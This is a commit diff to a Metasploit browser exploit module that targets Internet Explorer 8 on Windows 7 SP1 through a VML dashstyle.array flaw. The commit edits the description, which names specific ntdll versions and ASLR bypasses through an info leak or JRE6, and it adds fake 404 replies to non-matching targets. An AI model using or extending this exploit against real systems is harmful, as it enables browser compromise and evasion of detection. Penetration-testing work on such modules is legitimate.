Change description a bit
parent
2dedaee9ca
commit
bb9c961847
|
@ -10,17 +10,6 @@ class Metasploit3 < Msf::Exploit::Remote
|
|||
|
||||
include Msf::Exploit::Remote::BrowserExploitServer
|
||||
include Msf::Exploit::RopDb
|
||||
#include Msf::Exploit::Remote::BrowserAutopwn
|
||||
|
||||
#autopwn_info({
|
||||
# :ua_name => HttpClients::IE,
|
||||
# :ua_minver => "8.0",
|
||||
# :ua_maxver => "8.0",
|
||||
# :javascript => true,
|
||||
# :os_name => OperatingSystems::Match::WINDOWS,
|
||||
# :rank => Rank
|
||||
#})
|
||||
|
||||
|
||||
def initialize(info={})
|
||||
super(update_info(info,
|
||||
|
@ -30,15 +19,18 @@ class Metasploit3 < Msf::Exploit::Remote
|
|||
The vulnerability exists in the handling of the dashstyle.array length for vml
|
||||
shapes on the vgx.dll module.
|
||||
|
||||
This module has been built and tested specifically against Windows 7 SP1 with
|
||||
The exploit has been built and tested specifically against Windows 7 SP1 with
|
||||
Internet Explorer 8. It uses either JRE6 or an information leak (to ntdll) to
|
||||
bypass ASLR, and by default the info leak is used. The ntdll version should be
|
||||
either v6.1.7601.17514 (the default dll version on a newly installed/unpatched
|
||||
Windows 7 SP1), or ntdll.dll v6.1.7601.17725 (installed after apply MS12-001).
|
||||
bypass ASLR, and by default the info leak is used. To make sure the leak is
|
||||
successful, the ntdll version should be either v6.1.7601.17514 (the default dll
|
||||
version on a newly installed/unpatched Windows 7 SP1), or ntdll.dll v6.1.7601.17725
|
||||
(installed after apply MS12-001). If the target doesn't have the version the exploit
|
||||
wants, it will refuse to attack by sending a fake 404 message (webpage not found).
|
||||
|
||||
If you wish to try the JRE6 component instead to bypass ASLR, you can set the
|
||||
advanced datastore option to 'JRE6'. If JRE6 is chosen but the target doesn't
|
||||
have this particular component, the exploit will refuse the attack.
|
||||
have this particular component, the exploit will also refuse to attack by
|
||||
sending a 404 message.
|
||||
},
|
||||
'License' => MSF_LICENSE,
|
||||
'Author' =>
|
||||
|
@ -389,6 +381,7 @@ function exploit(){
|
|||
rescue RuntimeError => e
|
||||
# This one is just a warning, because it's a requirement check so it's not that scary.
|
||||
print_warning(e.message)
|
||||
send_not_found(cli)
|
||||
return
|
||||
end
|
||||
|
||||
|
@ -421,7 +414,7 @@ function exploit(){
|
|||
@ntdll_version = "6.1.7601.17725" # MS12-001
|
||||
@ntdll_base = leak - 0x47090
|
||||
else
|
||||
print_error("ntdll version not detected, sending 404: #{agent}")
|
||||
print_warning("ntdll version not detected, sending 404: #{agent}")
|
||||
send_not_found(cli)
|
||||
return
|
||||
end
|
||||
|
|
Loading…
Reference in New Issue